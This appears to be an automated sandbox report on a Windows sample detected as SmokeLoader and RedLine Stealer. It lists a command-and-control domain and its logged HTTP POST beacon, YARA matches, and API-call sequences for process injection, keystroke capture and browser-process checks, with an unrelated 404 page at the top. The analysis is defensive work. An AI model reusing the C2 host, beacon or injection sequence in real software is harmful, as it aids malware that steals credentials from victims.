"-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at r3oidsofsios.com Port 80</address></body></html>
                Source: explorer.exe, 0000000F.00000002.507850080.00000000031D1000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: Referer: %SHost: %shttp://yandex.ru/yandsearchhttp://www.google.com/searchhttp://go.mail.ru/searchhttp://nova.rambler.ru/searchhttp://search.aol.com/aol/searchhttp://search.yahoo.com/search; WOW64; Win64; x64; Trident/7.0; rv:11.0) like Gecko; rv:58.0) Gecko/20100101 Firefox/58.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 OPR/50.0.2762.67) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 Edge/16.16299Mozilla/5.0 (Windows NT %d.%d%s%s/<ahref"' >%s%s%shttp:,FFddos_rules=|:|Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like GeckoConnection: close equals www.rambler.ru (Rambler)
                Source: explorer.exe, 0000000F.00000002.507850080.00000000031D1000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: Referer: %SHost: %shttp://yandex.ru/yandsearchhttp://www.google.com/searchhttp://go.mail.ru/searchhttp://nova.rambler.ru/searchhttp://search.aol.com/aol/searchhttp://search.yahoo.com/search; WOW64; Win64; x64; Trident/7.0; rv:11.0) like Gecko; rv:58.0) Gecko/20100101 Firefox/58.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 OPR/50.0.2762.67) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 Edge/16.16299Mozilla/5.0 (Windows NT %d.%d%s%s/<ahref"' >%s%s%shttp:,FFddos_rules=|:|Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like GeckoConnection: close equals www.yahoo.com (Yahoo)
                Source: explorer.exe, explorer.exe, 0000000F.00000002.507850080.00000000031D1000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://go.mail.ru/search
                Source: explorer.exe, explorer.exe, 0000000F.00000002.507850080.00000000031D1000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://nova.rambler.ru/search
                Source: explorer.exe, 0000000A.00000000.405631874.0000000000CF0000.00000040.80000000.00040000.00000000.sdmp, explorer.exe, 0000000B.00000000.408629568.0000000000D20000.00000040.80000000.00040000.00000000.sdmp, explorer.exe, 0000000B.00000002.508519891.0000000001039000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000000.411589845.00000000009E0000.00000040.80000000.00040000.00000000.sdmp, explorer.exe, 0000000C.00000002.509151416.00000000032B7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000D.00000000.414672467.0000000000F50000.00000040.80000000.00040000.00000000.sdmp, explorer.exe, 0000000D.00000002.508405258.0000000001268000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000000.420288650.00000000031E0000.00000040.80000000.00040000.00000000.sdmp, explorer.exe, 00000010.00000000.423035885.00000000007E0000.00000040.80000000.00040000.00000000.sdmp, explorer.exe, 00000010.00000002.509492375.0000000000C83000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000011.00000002.508629995.0000000000CE8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000011.00000000.425875513.0000000000AE0000.00000040.80000000.00040000.00000000.sdmp, explorer.exe, 00000014.00000000.428749130.0000000000580000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://r3oidsofsios.com/
                Source: explorer.exe, 0000000A.00000000.405631874.0000000000CF0000.00000040.80000000.00040000.00000000.sdmp, explorer.exe, 0000000B.00000000.408629568.0000000000D20000.00000040.80000000.00040000.00000000.sdmp, explorer.exe, 0000000B.00000002.508519891.0000000001039000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000000.411589845.00000000009E0000.00000040.80000000.00040000.00000000.sdmp, explorer.exe, 0000000C.00000002.509151416.00000000032B7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000D.00000000.414672467.0000000000F50000.00000040.80000000.00040000.00000000.sdmp, explorer.exe, 0000000D.00000002.508405258.0000000001268000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000000.420288650.00000000031E0000.00000040.80000000.00040000.00000000.sdmp, explorer.exe, 00000010.00000000.423035885.00000000007E0000.00000040.80000000.00040000.00000000.sdmp, explorer.exe, 00000010.00000002.509492375.0000000000C83000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000011.00000002.508629995.0000000000CE8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000011.00000000.425875513.0000000000AE0000.00000040.80000000.00040000.00000000.sdmp, explorer.exe, 00000014.00000000.428749130.0000000000580000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://r3oidsofsios.com/Mozilla/5.0
                Source: explorer.exe, explorer.exe, 0000000F.00000002.507850080.00000000031D1000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://search.aol.com/aol/search
                Source: explorer.exe, explorer.exe, 0000000F.00000002.507850080.00000000031D1000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://search.yahoo.com/search
                Source: explorer.exe, explorer.exe, 0000000F.00000002.507850080.00000000031D1000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.google.com/search
                Source: unknownHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://kqgkblakc.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 323Host: r3oidsofsios.com
                Source: unknownDNS traffic detected: queries for: r3oidsofsios.com
                Source: C:\Windows\SysWOW64\explorer.exeCode function: 15_2_031D1F2A recv,15_2_031D1F2A

                Key, Mouse, Clipboard, Microphone and Screen Capturing

                barindex
                Yara detected SmokeLoader
                Source: Yara matchFile source: 0000000D.00000002.507736401.0000000000F41000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000C.00000002.507826700.00000000009D1000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 1836, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 4584, type: MEMORYSTR
                Source: Yara matchFile source: 9.2.jdggfai.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 9.3.jdggfai.6f0000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.file.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.3.file.exe.5e0000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.file.exe.5d0e67.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 9.2.jdggfai.6d0e67.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.347095759.00000000020A1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000002.406829127.0000000000700000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000003.388354905.00000000006F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.346666685.00000000005E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000002.407192385.00000000020D1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.245341240.00000000005E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000000.338708718.0000000002661000.00000020.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_007D162B GetKeyboardState,ToUnicode,16_2_007D162B

                E-Banking Fraud

                barindex
                Checks if browser processes are running
                Source: C:\Windows\SysWOW64\explorer.exeCode function: GetModuleFileNameA,GetCurrentProcessId,wsprintfA,CreateMutexA,GetLastError,RtlInitializeCriticalSection,PathFindFileNameA,lstrcat,Sleep,lstrcmpi,lstrcmpi,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetProcAddress,lstrcmpi,lstrcmpi,lstrcmpi,StrStrIA,GetCommandLineA,GetCommandLineA,StrStrIA,GetModuleHandleA,lstrcmpi,GetCommandLineA,StrStrIA,lstrcmpi,GetCommandLineA,StrStrIA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,RtlExitUserThread,wsprintfA,lstrcmpi,CreateToolhelp32Snapshot,Process32First,FindCloseChangeNotification,Sleep, firefox.exe10_2_00CE38EA
                Source: C:\Windows\SysWOW64\explorer.exeCode function: GetModuleFileNameA,GetCurrentProcessId,wsprintfA,CreateMutexA,GetLastError,RtlInitializeCriticalSection,PathFindFileNameA,lstrcat,Sleep,lstrcmpi,lstrcmpi,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetProcAddress,lstrcmpi,lstrcmpi,lstrcmpi,StrStrIA,GetCommandLineA,GetCommandLineA,StrStrIA,GetModuleHandleA,lstrcmpi,GetCommandLineA,StrStrIA,lstrcmpi,GetCommandLineA,StrStrIA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,RtlExitUserThread,wsprintfA,lstrcmpi,CreateToolhelp32Snapshot,Process32First,FindCloseChangeNotification,Sleep, iexplore.exe10_2_00CE38EA
                Source: C:\Windows\SysWOW64\explorer.exeCode function: GetModuleFileNameA,GetCurrentProcessId,wsprintfA,CreateMutexA,GetLastError,RtlInitializeCriticalSection,PathFindFileNameA,lstrcat,Sleep,lstrcmpi,lstrcmpi,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetProcAddress,lstrcmpi,lstrcmpi,lstrcmpi,StrStrIA,GetCommandLineA,GetCommandLineA,StrStrIA,GetModuleHandleA,lstrcmpi,GetCommandLineA,StrStrIA,lstrcmpi,GetCommandLineA,StrStrIA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,RtlExitUserThread,wsprintfA,lstrcmpi,CreateToolhelp32Snapshot,Process32First,FindCloseChangeNotification,Sleep, microsoftedgecp.exe10_2_00CE38EA
                Source: C:\Windows\SysWOW64\explorer.exeCode function: GetModuleFileNameA,GetCurrentProcessId,wsprintfA,CreateMutexA,GetLastError,RtlInitializeCriticalSection,PathFindFileNameA,lstrcat,Sleep,lstrcmpi,lstrcmpi,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetProcAddress,lstrcmpi,lstrcmpi,lstrcmpi,StrStrIA,GetCommandLineA,GetCommandLineA,StrStrIA,GetModuleHandleA,lstrcmpi,GetCommandLineA,StrStrIA,lstrcmpi,GetCommandLineA,StrStrIA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,RtlExitUserThread,wsprintfA,lstrcmpi,CreateToolhelp32Snapshot,Process32First,FindCloseChangeNotification,Sleep, chrome.exe10_2_00CE38EA
                Source: C:\Windows\SysWOW64\explorer.exeCode function: 20_2_0057226C CreateDesktopW,SetThreadDesktop,RtlZeroMemory,RtlZeroMemory,CreateProcessW,ResumeThread,20_2_0057226C

                System Summary

                barindex
                Malicious sample detected (through community Yara rule)
                Source: 00000009.00000002.407040058.0000000000748000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                Source: 00000000.00000002.347095759.00000000020A1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
                Source: 0000000C.00000000.411589845.00000000009E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
                Source: 0000000F.00000000.420288650.00000000031E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
                Source: 00000000.00000002.346601770.00000000005D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                Source: 00000009.00000002.406829127.0000000000700000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
                Source: 00000000.00000002.346812958.000000000060A000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                Source: 00000010.00000000.423035885.00000000007E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
                Source: 00000000.00000002.346666685.00000000005E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
                Source: 00000014.00000000.428749130.0000000000580000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
                Source: 00000009.00000002.406779661.00000000006D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                Source: 00000009.00000002.407192385.00000000020D1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
                Source: 0000000E.00000000.417608043.00000000003D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
                Source: 0000000A.00000000.405631874.0000000000CF0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
                Source: 00000001.00000000.338708718.0000000002661000.00000020.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
                Source: file.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: 00000009.00000002.407040058.0000000000748000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                Source: 00000000.00000002.347095759.00000000020A1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
                Source: 0000000C.00000000.411589845.00000000009E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
                Source: 0000000F.00000000.420288650.00000000031E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
                Source: 00000000.00000002.346601770.00000000005D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                Source: 00000009.00000002.406829127.0000000000700000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
                Source: 00000000.00000002.346812958.000000000060A000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                Source: 00000010.00000000.423035885.00000000007E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
                Source: 00000000.00000002.346666685.00000000005E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
                Source: 00000014.00000000.428749130.0000000000580000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
                Source: 00000009.00000002.406779661.00000000006D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                Source: 00000009.00000002.407192385.00000000020D1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
                Source: 0000000E.00000000.417608043.00000000003D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
                Source: 0000000A.00000000.405631874.0000000000CF0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
                Source: 00000001.00000000.338708718.0000000002661000.00000020.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
                Source: C:\Windows\SysWOW64\explorer.exeCode function: 20_2_00572171 StrStrIW,StrStrIW,RtlZeroMemory,ShellExecuteExW,StrStrIW,RtlAdjustPrivilege,ExitWindowsEx,20_2_00572171
                Source: C:\Windows\explorer.exeCode function: 11_2_00D173EF11_2_00D173EF
                Source: C:\Windows\explorer.exeCode function: 11_2_00D1245011_2_00D12450
                Source: C:\Windows\explorer.exeCode function: 11_2_00D12D6011_2_00D12D60
                Source: C:\Windows\explorer.exeCode function: 13_2_00F4286013_2_00F42860
                Source: C:\Windows\explorer.exeCode function: 13_2_00F4205413_2_00F42054
                Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_003A803C14_2_003A803C
                Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_003A3D2814_2_003A3D28
                Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_003AE95C14_2_003AE95C
                Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_003AF9F414_2_003AF9F4
                Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_003AC39214_2_003AC392
                Source: C:\Windows\SysWOW64\explorer.exeCode function: 15_2_031D142C15_2_031D142C
                Source: C:\Windows\explorer.exeCode function: 17_2_00AD2A0417_2_00AD2A04
                Source: C:\Windows\explorer.exeCode function: 17_2_00AD20F417_2_00AD20F4
                Source: C:\Windows\SysWOW64\explorer.exeCode function: 20_2_00572ADD20_2_00572ADD
                Source: C:\Windows\SysWOW64\explorer.exeCode function: String function: 003A8E70 appears 32 times
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004015D5 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,0_2_004015D5
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00401602 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,0_2_00401602
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00401605 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,0_2_00401605
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00401609 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,0_2_00401609
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00401613 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,0_2_00401613
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00401617 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,0_2_00401617
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004033CC GetModuleHandleA,GetModuleFileNameW,ExpandEnvironmentStringsW,CreateFileMappingW,GetKeyboardLayoutList,GetTokenInformation,ShellExecuteExW,NtOpenProcess,NtCreateSection,NtAllocateVirtualMemory,NtDuplicateObject,NtQueryInformationProcess,NtOpenKey,NtEnumerateKey,strstr,wcsstr,tolower,towlower,0_2_004033CC
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004015D4 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,0_2_004015D4
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004015E0 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,0_2_004015E0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004015EA NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,0_2_004015EA
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004015EE NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,0_2_004015EE
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00402693 NtOpenKey,NtEnumerateKey,NtEnumerateKey,0_2_00402693
                Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_00CE3DB7 RtlMoveMemory,RtlMoveMemory,NtUnmapViewOfSection,10_2_00CE3DB7
                Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_00CE20A3 NtCreateSection,NtMapViewOfSection,10_2_00CE20A3
                Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_00CE213A lstrcmpi,OpenProcess,NtSetInformationProcess,CloseHandle,NtUnmapViewOfSection,NtUnmapViewOfSection,RtlMoveMemory,RtlMoveMemory,RtlMoveMemory,NtUnmapViewOfSection,CloseHandle,CreateMutexA,GetLastError,CloseHandle,Sleep,GetModuleHandleA,GetProcAddress,ReadProcessMemory,WriteProcessMemory,CreateRemoteThread,CloseHandle,Sleep,WriteProcessMemory,CreateRemoteThread,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,10_2_00CE213A
                Source: C:\Windows\explorer.exeCode function: 11_2_00D1527C RtlAllocateHeap,NtUnmapViewOfSection,11_2_00D1527C
